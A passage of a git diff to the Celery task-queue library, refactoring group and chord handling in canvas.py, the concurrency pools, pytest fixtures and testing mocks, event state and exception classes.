+ return group(rebuilt_tasks, app=app, **d['options'])
def __init__(self, *tasks, **options):
if len(tasks) == 1:
@@ -1041,9 +1053,8 @@ def __init__(self, *tasks, **options):
tasks = [tasks.clone()]
if not isinstance(tasks, _regen):
tasks = regen(tasks)
- Signature.__init__(
- self, 'celery.group', (), {'tasks': tasks}, **options
- )
+ super().__init__('celery.group', (), {'tasks': tasks}, **options
+ )
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
@@ -1100,7 +1111,7 @@ def apply(self, args=None, kwargs=None, **options):
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
return app.GroupResult(group_id, [
- sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
+ sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks
])
def set_immutable(self, immutable):
@@ -1108,19 +1119,25 @@ def set_immutable(self, immutable):
task.set_immutable(immutable)
def link(self, sig):
- # Simply link to first task
+ # Simply link to first task. Doing this is slightly misleading because
+ # the callback may be executed before all children in the group are
+ # completed and also if any children other than the first one fail.
+ #
+ # The callback signature is cloned and made immutable since it the
+ # first task isn't actually capable of passing the return values of its
+ # siblings to the callback task.
sig = sig.clone().set(immutable=True)
return self.tasks[0].link(sig)
def link_error(self, sig):
- try:
- sig = sig.clone().set(immutable=True)
- except AttributeError:
- # See issue #5265. I don't use isinstance because current tests
- # pass a Mock object as argument.
- sig['immutable'] = True
- sig = Signature.from_dict(sig)
- return self.tasks[0].link_error(sig)
+ # Any child task might error so we need to ensure that they are all
+ # capable of calling the linked error signature. This opens the
+ # possibility that the task is called more than once but that's better
+ # than it not being called at all.
+ #
+ # We return a concretised tuple of the signatures actually applied to
+ # each child task signature, of which there might be none!
+ return tuple(child_task.link_error(sig) for child_task in self.tasks)
def _prepared(self, tasks, partial_args, group_id, root_id, app,
CallableSignature=abstract.CallableSignature,
@@ -1143,7 +1160,7 @@ def _prepared(self, tasks, partial_args, group_id, root_id, app,
else:
if partial_args and not task.immutable:
task.args = tuple(partial_args) + tuple(task.args)
- yield task, task.freeze(group_id=group_id, root_id=root_id)
+ yield task, task.freeze(group_id=group_id, root_id=root_id), group_id
def _apply_tasks(self, tasks, producer=None, app=None, p=None,
add_to_parent=None, chord=None,
@@ -1152,12 +1169,30 @@ def _apply_tasks(self, tasks, producer=None, app=None, p=None,
# XXX chord is also a class in outer scope.
app = app or self.app
with app.producer_or_acquire(producer) as producer:
- for sig, res in tasks:
+ # Iterate through tasks two at a time. If tasks is a generator,
+ # we are able to tell when we are at the end by checking if
+ # next_task is None. This enables us to set the chord size
+ # without burning through the entire generator. See #3021.
+ chord_size = 0
+ for task_index, (current_task, next_task) in enumerate(
+ lookahead(tasks)
+ ):
+ # We expect that each task must be part of the same group which
+ # seems sensible enough. If that's somehow not the case we'll
+ # end up messing up chord counts and there are all sorts of
+ # awful race conditions to think about. We'll hope it's not!
+ sig, res, group_id = current_task
+ chord_obj = chord if chord is not None else sig.options.get("chord")
+ # We need to check the chord size of each contributing task so
+ # that when we get to the final one, we can correctly set the
+ # size in the backend and the chord can be sensible completed.
+ chord_size += _chord._descend(sig)
+ if chord_obj is not None and next_task is None:
+ # Per above, sanity check that we only saw one group
+ app.backend.set_chord_size(group_id, chord_size)
sig.apply_async(producer=producer, add_to_parent=False,
- chord=sig.options.get('chord') or chord,
- args=args, kwargs=kwargs,
+ chord=chord_obj, args=args, kwargs=kwargs,
**options)
-
# adding callback to result, such that it will gradually
# fulfill the barrier.
#
@@ -1177,10 +1212,10 @@ def _freeze_gid(self, options):
options.pop('task_id', uuid()))
return options, group_id, options.get('root_id')
- def freeze(self, _id=None, group_id=None, chord=None,
- root_id=None, parent_id=None, group_index=None):
+ def _freeze_group_tasks(self, _id=None, group_id=None, chord=None,
+ root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
- # XXX chord is also a class in outer scope.
+ # XXX chord is also a class in outer scope.
opts = self.options
try:
gid = opts['task_id']
@@ -1194,20 +1229,44 @@ def freeze(self, _id=None, group_id=None, chord=None,
opts['group_index'] = group_index
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
- new_tasks = []
- # Need to unroll subgroups early so that chord gets the
- # right result instance for chord_unlock etc.
- results = list(self._freeze_unroll(
- new_tasks, group_id, chord, root_id, parent_id,
- ))
- if isinstance(self.tasks, MutableSequence):
- self.tasks[:] = new_tasks
+ if isinstance(self.tasks, _regen):
+ # We are draining from a geneator here.
+ tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks))
+ results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id))
+ self.tasks = regen(x[0] for x in zip(tasks2, results))
else:
- self.tasks = new_tasks
- return self.app.GroupResult(gid, results)
+ new_tasks = []
+ # Need to unroll subgroups early so that chord gets the
+ # right result instance for chord_unlock etc.
+ results = list(self._freeze_unroll(
+ new_tasks, group_id, chord, root_id, parent_id,
+ ))
+ if isinstance(self.tasks, MutableSequence):
+ self.tasks[:] = new_tasks
+ else:
+ self.tasks = new_tasks
+ return gid, results
+
+ def freeze(self, _id=None, group_id=None, chord=None,
+ root_id=None, parent_id=None, group_index=None):
+ return self.app.GroupResult(*self._freeze_group_tasks(
+ _id=_id, group_id=group_id,
+ chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index
+ ))
_freeze = freeze
+ def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id):
+ yield from (task.freeze(group_id=group_id,
+ chord=chord,
+ root_id=root_id,
+ parent_id=parent_id,
+ group_index=group_index)
+ for group_index, task in enumerate(tasks))
+
+ def _unroll_tasks(self, tasks):
+ yield from (maybe_signature(task, app=self._app).clone() for task in tasks)
+
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
@@ -1246,8 +1305,8 @@ def app(self):
return app if app is not None else current_app
-@Signature.register_type()
-class chord(Signature):
+@Signature.register_type(name="chord")
+class _chord(Signature):
r"""Barrier synchronization primitive.
A chord consists of a header and a body.
@@ -1278,7 +1337,7 @@ class chord(Signature):
def from_dict(cls, d, app=None):
options = d.copy()
args, options['kwargs'] = cls._unpack_args(**options['kwargs'])
- return _upgrade(d, cls(*args, app=app, **options))
+ return cls(*args, app=app, **options)
@staticmethod
def _unpack_args(header=None, body=None, **kwargs):
@@ -1289,12 +1348,11 @@ def _unpack_args(header=None, body=None, **kwargs):
def __init__(self, header, body=None, task='celery.chord',
args=None, kwargs=None, app=None, **options):
args = args if args else ()
- kwargs = kwargs if kwargs else {}
- Signature.__init__(
- self, task, args,
- {'kwargs': kwargs, 'header': _maybe_group(header, app),
- 'body': maybe_signature(body, app=app)}, app=app, **options
- )
+ kwargs = kwargs if kwargs else {'kwargs': {}}
+ super().__init__(task, args,
+ {**kwargs, 'header': _maybe_group(header, app),
+ 'body': maybe_signature(body, app=app)}, app=app, **options
+ )
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
@@ -1364,21 +1422,37 @@ def apply(self, args=None, kwargs=None,
args=(tasks.apply(args, kwargs).get(propagate=propagate),),
)
- def _traverse_tasks(self, tasks, value=None):
- stack = deque(tasks)
- while stack:
- task = stack.popleft()
- if isinstance(task, group):
- stack.extend(task.tasks)
- elif isinstance(task, _chain) and isinstance(task.tasks[-1], group):
- stack.extend(task.tasks[-1].tasks)
+ @classmethod
+ def _descend(cls, sig_obj):
+ # Sometimes serialized signatures might make their way here
+ if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict):
+ sig_obj = Signature.from_dict(sig_obj)
+ if isinstance(sig_obj, group):
+ # Each task in a group counts toward this chord
+ subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks)
+ return sum(cls._descend(task) for task in subtasks)
+ elif isinstance(sig_obj, _chain):
+ # The last non-empty element in a chain counts toward this chord
+ for child_sig in sig_obj.tasks[-1::-1]:
+ child_size = cls._descend(child_sig)
+ if child_size > 0:
+ return child_size
else:
- yield task if value is None else value
+ # We have to just hope this chain is part of some encapsulating
+ # signature which is valid and can fire the chord body
+ return 0
+ elif isinstance(sig_obj, chord):
+ # The child chord's body counts toward this chord
+ return cls._descend(sig_obj.body)
+ elif isinstance(sig_obj, Signature):
+ # Each simple signature counts as 1 completion for this chord
+ return 1
+ # Any other types are assumed to be iterables of simple signatures
+ return len(sig_obj)
def __length_hint__(self):
- tasks = (self.tasks.tasks if isinstance(self.tasks, group)
- else self.tasks)
- return sum(self._traverse_tasks(tasks, 1))
+ tasks = getattr(self.tasks, "tasks", self.tasks)
+ return sum(self._descend(task) for task in tasks)
def run(self, header, body, partial_args, app=None, interval=None,
countdown=1, max_retries=None, eager=False,
@@ -1386,7 +1460,6 @@ def run(self, header, body, partial_args, app=None, interval=None,
app = app or self._get_app(body)
group_id = header.options.get('task_id') or uuid()
root_id = body.options.get('root_id')
- body.chord_size = self.__length_hint__()
options = dict(self.options, **options) if options else self.options
if options:
options.pop('task_id', None)
@@ -1400,11 +1473,11 @@ def run(self, header, body, partial_args, app=None, interval=None,
options.pop('chord', None)
options.pop('task_id', None)
- header_result = header.freeze(group_id=group_id, chord=body, root_id=root_id)
+ header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id)
- if len(header_result) > 0:
+ if header.tasks:
app.backend.apply_chord(
- header_result,
+ header_result_args,
body,
interval=interval,
countdown=countdown,
@@ -1416,12 +1489,13 @@ def run(self, header, body, partial_args, app=None, interval=None,
# we execute the body manually here.
else:
body.delay([])
+ header_result = self.app.GroupResult(*header_result_args)
bodyres.parent = header_result
return bodyres
def clone(self, *args, **kwargs):
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
# need to make copy of body
try:
signature.kwargs['body'] = maybe_signature(
@@ -1468,7 +1542,7 @@ def _get_app(self, body=None):
tasks = self.tasks.tasks # is a group
except AttributeError:
tasks = self.tasks
- if len(tasks):
+ if tasks:
app = tasks[0]._app
if app is None and body is not None:
app = body._app
@@ -1478,6 +1552,11 @@ def _get_app(self, body=None):
body = getitem_property('kwargs.body', 'Body task of chord.')
+# Add a back-compat alias for the previous `chord` class name which conflicts
+# with keyword arguments elsewhere in this file
+chord = _chord
+
+
def signature(varies, *args, **kwargs):
"""Create new signature.
@@ -1495,7 +1574,7 @@ def signature(varies, *args, **kwargs):
return Signature(varies, *args, **kwargs)
-subtask = signature # noqa: E305 XXX compat
+subtask = signature # XXX compat
def maybe_signature(d, app=None, clone=False):
@@ -1525,4 +1604,4 @@ def maybe_signature(d, app=None, clone=False):
return d
-maybe_subtask = maybe_signature # noqa: E305 XXX compat
+maybe_subtask = maybe_signature # XXX compat
diff --git a/celery/concurrency/__init__.py b/celery/concurrency/__init__.py
index c4c64764e3e..a326c79aff2 100644
--- a/celery/concurrency/__init__.py
+++ b/celery/concurrency/__init__.py
@@ -5,7 +5,7 @@
# too much (e.g., for eventlet patching)
from kombu.utils.imports import symbol_by_name
-__all__ = ('get_implementation',)
+__all__ = ('get_implementation', 'get_available_pool_names',)
ALIASES = {
'prefork': 'celery.concurrency.prefork:TaskPool',
@@ -26,3 +26,8 @@
def get_implementation(cls):
"""Return pool implementation by name."""
return symbol_by_name(cls, ALIASES)
+
+
+def get_available_pool_names():
+ """Return all available pool type names."""
+ return tuple(ALIASES.keys())
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index 4d2dd1138d2..d5d2bdb5124 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -16,12 +16,12 @@
import gc
import os
import select
-import sys
import time
from collections import Counter, deque, namedtuple
from io import BytesIO
from numbers import Integral
from pickle import HIGHEST_PROTOCOL
+from struct import pack, unpack, unpack_from
from time import sleep
from weakref import WeakValueDictionary, ref
@@ -35,7 +35,6 @@
from kombu.utils.functional import fxrange
from vine import promise
-from celery.platforms import pack, unpack, unpack_from
from celery.utils.functional import noop
from celery.utils.log import get_logger
from celery.worker import state as worker_state
@@ -47,21 +46,15 @@
from _billiard import read as __read__
readcanbuf = True
- # unpack_from supports memoryview in 2.7.6 and 3.3+
- if sys.version_info[0] == 2 and sys.version_info < (2, 7, 6):
-
- def unpack_from(fmt, view, _unpack_from=unpack_from): # noqa
- return _unpack_from(fmt, view.tobytes()) # <- memoryview
-
except ImportError: # pragma: no cover
- def __read__(fd, buf, size, read=os.read): # noqa
+ def __read__(fd, buf, size, read=os.read):
chunk = read(fd, size)
n = len(chunk)
if n != 0:
buf.write(chunk)
return n
- readcanbuf = False # noqa
+ readcanbuf = False
def unpack_from(fmt, iobuf, unpack=unpack): # noqa
return unpack(fmt, iobuf.getvalue()) # <-- BytesIO
@@ -84,6 +77,7 @@ def unpack_from(fmt, iobuf, unpack=unpack): # noqa
SCHED_STRATEGIES = {
None: SCHED_STRATEGY_FAIR,
+ 'default': SCHED_STRATEGY_FAIR,
'fast': SCHED_STRATEGY_FCFS,
'fcfs': SCHED_STRATEGY_FCFS,
'fair': SCHED_STRATEGY_FAIR,
@@ -984,10 +978,14 @@ def _write_ack(fd, ack, callback=None):
def flush(self):
if self._state == TERMINATE:
return
- # cancel all tasks that haven't been accepted so that NACK is sent.
- for job in self._cache.values():
+ # cancel all tasks that haven't been accepted so that NACK is sent
+ # if synack is enabled.
+ for job in tuple(self._cache.values()):
if not job._accepted:
- job._cancel()
+ if self.synack:
+ job._cancel()
+ else:
+ job.discard()
# clear the outgoing buffer as the tasks will be redelivered by
# the broker anyway.
@@ -1070,7 +1068,7 @@ def get_process_queues(self):
if owner is None)
def on_grow(self, n):
- """Grow the pool by ``n`` proceses."""
+ """Grow the pool by ``n`` processes."""
diff = max(self._processes - len(self._queues), 0)
if diff:
self._queues.update({
@@ -1250,7 +1248,7 @@ def on_partial_read(self, job, proc):
"""Called when a job was partially written to exited child."""
# worker terminated by signal:
# we cannot reuse the sockets again, because we don't know if
- # the process wrote/read anything frmo them, and if so we cannot
+ # the process wrote/read anything from them, and if so we cannot
# restore the message boundaries.
if not job._accepted:
# job was not acked, so find another worker to send it to.
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index bf794d47f16..f9c9da7f994 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,11 +2,12 @@
import sys
from time import monotonic
-from kombu.asynchronous import timer as _timer # noqa
+from greenlet import GreenletExit
+from kombu.asynchronous import timer as _timer
-from celery import signals # noqa
+from celery import signals
-from . import base # noqa
+from . import base
__all__ = ('TaskPool',)
@@ -93,6 +94,7 @@ class TaskPool(base.BasePool):
is_green = True
task_join_will_block = False
_pool = None
+ _pool_map = None
_quick_put = None
def __init__(self, *args, **kwargs):
@@ -107,8 +109,9 @@ def __init__(self, *args, **kwargs):
def on_start(self):
self._pool = self.Pool(self.limit)
+ self._pool_map = {}
signals.eventlet_pool_started.send(sender=self)
- self._quick_put = self._pool.spawn_n
+ self._quick_put = self._pool.spawn
self._quick_apply_sig = signals.eventlet_pool_apply.send
def on_stop(self):
@@ -119,12 +122,17 @@ def on_stop(self):
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
- self._quick_apply_sig(
- sender=self, target=target, args=args, kwargs=kwargs,
+ target = TaskPool._make_killable_target(target)
+ self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,)
+ greenlet = self._quick_put(
+ apply_target,
+ target, args,
+ kwargs,
+ callback,
+ accept_callback,
+ self.getpid
)
- self._quick_put(apply_target, target, args, kwargs,
- callback, accept_callback,
- self.getpid)
+ self._add_to_pool_map(id(greenlet), greenlet)
def grow(self, n=1):
limit = self.limit + n
@@ -136,6 +144,12 @@ def shrink(self, n=1):
self._pool.resize(limit)
self.limit = limit
+ def terminate_job(self, pid, signal=None):
+ if pid in self._pool_map.keys():
+ greenlet = self._pool_map[pid]
+ greenlet.kill()
+ greenlet.wait()
+
def _get_info(self):
info = super()._get_info()
info.update({
@@ -144,3 +158,24 @@ def _get_info(self):
'running-threads': self._pool.running(),
})
return info
+
+ @staticmethod
+ def _make_killable_target(target):
+ def killable_target(*args, **kwargs):
+ try:
+ return target(*args, **kwargs)
+ except GreenletExit:
+ return (False, None, None)
+ return killable_target
+
+ def _add_to_pool_map(self, pid, greenlet):
+ self._pool_map[pid] = greenlet
+ greenlet.link(
+ TaskPool._cleanup_after_job_finish,
+ self._pool_map,
+ pid
+ )
+
+ @staticmethod
+ def _cleanup_after_job_finish(greenlet, pool_map, pid):
+ del pool_map[pid]
diff --git a/celery/concurrency/gevent.py b/celery/concurrency/gevent.py
index 0bb3e4919ff..33a61bf6198 100644
--- a/celery/concurrency/gevent.py
+++ b/celery/concurrency/gevent.py
@@ -8,7 +8,7 @@
try:
from gevent import Timeout
except ImportError: # pragma: no cover
- Timeout = None # noqa
+ Timeout = None
__all__ = ('TaskPool',)
diff --git a/celery/concurrency/prefork.py b/celery/concurrency/prefork.py
index a764611444a..40772ebae1a 100644
--- a/celery/concurrency/prefork.py
+++ b/celery/concurrency/prefork.py
@@ -41,6 +41,8 @@ def process_initializer(app, hostname):
Initialize the child pool process to ensure the correct
app instance is used and things like logging works.
"""
+ # Each running worker gets SIGKILL by OS when main process exits.
+ platforms.set_pdeathsig('SIGKILL')
_set_task_join_will_block(True)
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
diff --git a/celery/concurrency/thread.py b/celery/concurrency/thread.py
index eb9c8683c7d..ffd2e507f11 100644
--- a/celery/concurrency/thread.py
+++ b/celery/concurrency/thread.py
@@ -1,6 +1,5 @@
"""Thread execution pool."""
-import sys
from concurrent.futures import ThreadPoolExecutor, wait
from .base import BasePool, apply_target
@@ -25,11 +24,6 @@ class TaskPool(BasePool):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
-
- # from 3.5, it is calculated from number of CPUs
- if (3, 0) <= sys.version_info < (3, 5) and self.limit is None:
- self.limit = 5
-
self.executor = ThreadPoolExecutor(max_workers=self.limit)
def on_stop(self):
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index c54ea5cb0fa..858e4e5c447 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -1,11 +1,17 @@
"""Fixtures and testing utilities for :pypi:`pytest `."""
import os
from contextlib import contextmanager
+from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union
import pytest
-from .testing import worker
-from .testing.app import TestApp, setup_default_app
+if TYPE_CHECKING:
+ from celery import Celery
+
+ from ..worker import WorkController
+else:
+ Celery = WorkController = object
+
NO_WORKER = os.environ.get('NO_WORKER')
@@ -16,7 +22,7 @@
def pytest_configure(config):
"""Register additional pytest configuration."""
# add the pytest.mark.celery() marker registration to the pytest.ini [markers] section
- # this prevents pytest 4.5 and newer from issueing a warning about an unknown marker
+ # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker
# and shows helpful marker documentation when running pytest --markers.
config.addinivalue_line(
"markers", "celery(**overrides): override celery configuration for a test case"
@@ -30,6 +36,9 @@ def _create_app(enable_logging=False,
**config):
# type: (Any, Any, Any, **Any) -> Celery
"""Utility context used to setup Celery app for pytest fixtures."""
+
+ from .testing.app import TestApp, setup_default_app
+
parameters = {} if not parameters else parameters
test_app = TestApp(
set_as_current=False,
@@ -83,6 +92,8 @@ def celery_session_worker(
):
# type: (...) -> WorkController
"""Session Fixture: Start worker that lives throughout test suite."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_session_app.loader.import_task_module(module)
@@ -188,6 +199,8 @@ def celery_worker(request,
celery_worker_parameters):
# type: (Any, Celery, Sequence[str], str, Any) -> WorkController
"""Fixture: Start worker in a thread, stop it when the test returns."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_app.loader.import_task_module(module)
diff --git a/celery/contrib/rdb.py b/celery/contrib/rdb.py
index 6d346a0d36f..a34c0b52678 100644
--- a/celery/contrib/rdb.py
+++ b/celery/contrib/rdb.py
@@ -110,8 +110,8 @@ def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
- Pdb.__init__(self, completekey='tab',
- stdin=self._handle, stdout=self._handle)
+ super().__init__(completekey='tab',
+ stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
diff --git a/celery/contrib/testing/manager.py b/celery/contrib/testing/manager.py
index d053a03e81a..5c5c3e7797c 100644
--- a/celery/contrib/testing/manager.py
+++ b/celery/contrib/testing/manager.py
@@ -4,12 +4,13 @@
from collections import defaultdict
from functools import partial
from itertools import count
+from typing import Any, Callable, Dict, Sequence, TextIO, Tuple
from kombu.utils.functional import retry_over_time
from celery import states
from celery.exceptions import TimeoutError
-from celery.result import ResultSet
+from celery.result import AsyncResult, ResultSet
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds as _humanize_seconds
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 6294e6905cb..a7c00d4d033 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -1,11 +1,11 @@
"""Useful mocks for unit testing."""
import numbers
from datetime import datetime, timedelta
+from typing import Any, Mapping, Sequence
+from unittest.mock import Mock
-try:
- from case import Mock
-except ImportError:
- from unittest.mock import Mock
+from celery import Celery
+from celery.canvas import Signature
def TaskMessage(
@@ -49,7 +49,7 @@ def TaskMessage1(
kwargs=None, # type: Mapping
callbacks=None, # type: Sequence[Signature]
errbacks=None, # type: Sequence[Signature]
- chain=None, # type: Squence[Signature]
+ chain=None, # type: Sequence[Signature]
**options # type: Any
):
# type: (...) -> Any
@@ -109,3 +109,29 @@ def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage):
utc=utc,
**sig.options
)
+
+
+class _ContextMock(Mock):
+ """Dummy class implementing __enter__ and __exit__.
+
+ The :keyword:`with` statement requires these to be implemented
+ in the class, not just the instance.
+ """
+
+ def __enter__(self):
+ return self
+
+ def __exit__(self, *exc_info):
+ pass
+
+
+def ContextMock(*args, **kwargs):
+ """Mock that mocks :keyword:`with` statement contexts."""
+ obj = _ContextMock(*args, **kwargs)
+ obj.attach_mock(_ContextMock(), '__enter__')
+ obj.attach_mock(_ContextMock(), '__exit__')
+ obj.__enter__.return_value = obj
+ # if __exit__ return a value the exception is ignored,
+ # so it must return None here.
+ obj.__exit__.return_value = None
+ return obj
diff --git a/celery/contrib/testing/worker.py b/celery/contrib/testing/worker.py
index 78cc5951fb8..b4e68cb8dec 100644
--- a/celery/contrib/testing/worker.py
+++ b/celery/contrib/testing/worker.py
@@ -2,8 +2,10 @@
import os
import threading
from contextlib import contextmanager
+from typing import Any, Iterable, Union
-from celery import worker
+import celery.worker.consumer
+from celery import Celery, worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
@@ -59,6 +61,7 @@ def start_worker(
logfile=None, # type: str
perform_ping_check=True, # type: bool
ping_task_timeout=10.0, # type: float
+ shutdown_timeout=10.0, # type: float
**kwargs # type: Any
):
# type: (...) -> Iterable
@@ -75,6 +78,7 @@ def start_worker(
loglevel=loglevel,
logfile=logfile,
perform_ping_check=perform_ping_check,
+ shutdown_timeout=shutdown_timeout,
**kwargs) as worker:
if perform_ping_check:
from .tasks import ping
@@ -93,6 +97,7 @@ def _start_worker_thread(app,
logfile=None,
WorkController=TestWorkController,
perform_ping_check=True,
+ shutdown_timeout=10.0,
**kwargs):
# type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
"""Start Celery worker in a thread.
@@ -116,12 +121,12 @@ def _start_worker_thread(app,
logfile=logfile,
# not allowed to override TestWorkController.on_consumer_ready
ready_callback=None,
- without_heartbeat=True,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
without_mingle=True,
without_gossip=True,
**kwargs)
- t = threading.Thread(target=worker.start)
+ t = threading.Thread(target=worker.start, daemon=True)
t.start()
worker.ensure_started()
_set_task_join_will_block(False)
@@ -130,7 +135,13 @@ def _start_worker_thread(app,
from celery.worker import state
state.should_terminate = 0
- t.join(10)
+ t.join(shutdown_timeout)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
state.should_terminate = None
diff --git a/celery/events/cursesmon.py b/celery/events/cursesmon.py
index e9534a7a554..677c5e7556a 100644
--- a/celery/events/cursesmon.py
+++ b/celery/events/cursesmon.py
@@ -483,7 +483,7 @@ class DisplayThread(threading.Thread): # pragma: no cover
def __init__(self, display):
self.display = display
self.shutdown = False
- threading.Thread.__init__(self)
+ super().__init__()
def run(self):
while not self.shutdown:
diff --git a/celery/events/snapshot.py b/celery/events/snapshot.py
index 813b8db5c9e..d4dd65b174f 100644
--- a/celery/events/snapshot.py
+++ b/celery/events/snapshot.py
@@ -84,7 +84,8 @@ def __exit__(self, *exc_info):
def evcam(camera, freq=1.0, maxrate=None, loglevel=0,
- logfile=None, pidfile=None, timer=None, app=None):
+ logfile=None, pidfile=None, timer=None, app=None,
+ **kwargs):
"""Start snapshot recorder."""
app = app_or_default(app)
diff --git a/celery/events/state.py b/celery/events/state.py
index 4fef2bf38cc..febf1175145 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -22,6 +22,7 @@
from itertools import islice
from operator import itemgetter
from time import time
+from typing import Mapping
from weakref import WeakSet, ref
from kombu.clocks import timetuple
@@ -50,10 +51,10 @@
#: before we alert that clocks may be unsynchronized.
HEARTBEAT_DRIFT_MAX = 16
-DRIFT_WARNING = """\
-Substantial drift from %s may mean clocks are out of sync. Current drift is
-%s seconds. [orig: %s recv: %s]
-"""
+DRIFT_WARNING = (
+ "Substantial drift from %s may mean clocks are out of sync. Current drift is "
+ "%s seconds. [orig: %s recv: %s]"
+)
logger = get_logger(__name__)
warn = logger.warning
@@ -99,7 +100,7 @@ def __call__(self, *args, **kwargs):
return self.fun(*args, **kwargs)
-Callable.register(CallableDefaultdict) # noqa: E305
+Callable.register(CallableDefaultdict)
@memoize(maxsize=1000, keyfun=lambda a, _: a[0])
@@ -429,15 +430,13 @@ def __init__(self, callback=None,
self._tasks_to_resolve = {}
self.rebuild_taskheap()
- # type: Mapping[TaskName, WeakSet[Task]]
self.tasks_by_type = CallableDefaultdict(
- self._tasks_by_type, WeakSet)
+ self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_type.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks))
- # type: Mapping[Hostname, WeakSet[Task]]
self.tasks_by_worker = CallableDefaultdict(
- self._tasks_by_worker, WeakSet)
+ self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_worker.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks))
@@ -517,7 +516,7 @@ def worker_event(self, type_, fields):
return self._event(dict(fields, type='-'.join(['worker', type_])))[0]
def _create_dispatcher(self):
- # noqa: C901
+
# pylint: disable=too-many-statements
# This code is highly optimized, but not for reusability.
get_handler = self.handlers.__getitem__
diff --git a/celery/exceptions.py b/celery/exceptions.py
index 768cd4d22d2..64b017aa7c0 100644
--- a/celery/exceptions.py
+++ b/celery/exceptions.py
@@ -44,6 +44,7 @@
- :class:`~celery.exceptions.DuplicateNodenameWarning`
- :class:`~celery.exceptions.FixupWarning`
- :class:`~celery.exceptions.NotConfigured`
+ - :class:`~celery.exceptions.SecurityWarning`
- :exc:`BaseException`
- :exc:`SystemExit`
- :exc:`~celery.exceptions.WorkerTerminate`
@@ -54,6 +55,7 @@
from billiard.exceptions import (SoftTimeLimitExceeded, Terminated,
TimeLimitExceeded, WorkerLostError)
+from click import ClickException
from kombu.exceptions import OperationalError
__all__ = (
@@ -61,7 +63,7 @@
# Warnings
'CeleryWarning',
'AlwaysEagerIgnored', 'DuplicateNodenameWarning',
- 'FixupWarning', 'NotConfigured',
+ 'FixupWarning', 'NotConfigured', 'SecurityWarning',
# Core errors
'CeleryError',
@@ -91,6 +93,8 @@
# Worker shutdown semi-predicates (inherits from SystemExit).
'WorkerShutdown', 'WorkerTerminate',
+
+ 'CeleryCommandException',
)
UNREGISTERED_FMT = """\
@@ -125,6 +129,10 @@ class NotConfigured(CeleryWarning):
"""Celery hasn't been configured, as no config module has been found."""
+class SecurityWarning(CeleryWarning):
+ """Potential security issue found."""
+
+
class CeleryError(Exception):
"""Base class for all Celery errors."""
@@ -172,10 +180,10 @@ def __str__(self):
return f'Retry {self.humanize()}'
def __reduce__(self):
- return self.__class__, (self.message, self.excs, self.when)
+ return self.__class__, (self.message, self.exc, self.when)
-RetryTaskError = Retry # noqa: E305 XXX compat
+RetryTaskError = Retry # XXX compat
class Ignore(TaskPredicate):
@@ -263,7 +271,7 @@ class WorkerTerminate(SystemExit):
"""Signals that the worker should terminate immediately."""
-SystemTerminate = WorkerTerminate # noqa: E305 XXX compat
+SystemTerminate = WorkerTerminate # XXX compat
class WorkerShutdown(SystemExit):
@@ -285,7 +293,7 @@ def __repr__(self):
class BackendStoreError(BackendError):
- """An issue writing from the backend."""
+ """An issue writing to the backend."""
def __init__(self, *args, **kwargs):
self.state = kwargs.get('state', "")
@@ -293,3 +301,11 @@ def __init__(self, *args, **kwargs):
def __repr__(self):
return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id
+
+
+class CeleryCommandException(ClickException):
+ """A general command exception which stores an exit code."""
+
+ def __init__(self, message, exit_code):
+ super().__init__(message=message)
